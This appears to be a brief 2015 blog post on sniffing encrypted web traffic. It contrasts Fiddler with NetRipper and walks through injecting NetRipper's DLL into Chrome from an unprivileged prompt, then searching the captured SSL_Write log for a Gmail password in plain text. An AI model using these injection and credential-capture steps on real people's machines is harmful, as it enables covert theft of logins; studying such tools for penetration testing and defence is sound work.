Sniffing encrypted traffic #
Fiddler 📺 ("The free web debugging proxy for any browser, system or platform") has long been used for sniffing encrypted web traffic, but it requires full administrator access to install an untrusted root certificate for decryption to work (Tools > Fiddler Options... > HTTPS > etc) and the .NET Framework to run.
NetRipper ("Smart traffic sniffing for penetration testers") requires neither. It is "a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption." Further, "NetRipper should be able to capture network traffic from: Putty, WinSCP, SQL Server Management Studio, Lync (Skype for Business), Microsoft Outlook, Google Chrome, Mozilla Firefox. The list is not limited to these applications but other tools may require special support."
Here's a simple example of it in action:
- Launch Google Chrome
- Open cmd.exe (no need for elevated command prompt), cd to the NetRipper directory and run:
C:\Release>NetRipper.exe DLL.dll chrome.exe
Trying to inject DLL.dll in chrome.exe
Reflective injected in: 2880
Reflective injected in: 2992
Reflective injected in: 3096
- Login to GMail account in Chrome
- NetRipper saves data to %temp%\NetRipper by default (on most systems, this will be C:\Users\username\AppData\Local\Temp\NetRipper):
C:\Release>dir %temp%\NetRipper /B
2880_chrome.exe_recv.txt
2880_chrome.exe_SSL_Read.txt
2880_chrome.exe_SSL_Write.txt
2880_chrome.exe_StringFinder.txt
2880_chrome.exe_WSASend.txt
NetRipperLog.txt
- Search for the string "Passwd":
C:\Release>findstr Passwd %temp%\NetRipper\2880_chrome.exe_SSL_Write.txt
...Email=tinyapps%40gmail.com&Passwd=PASSWORD_IN_PLAIN_TEXT_SHOWN_HERE&PersistentCookie=yes&signIn=...
Fiddler:
NetRipper:
/windows | Aug 15, 2015
Subscribe or visit the archives.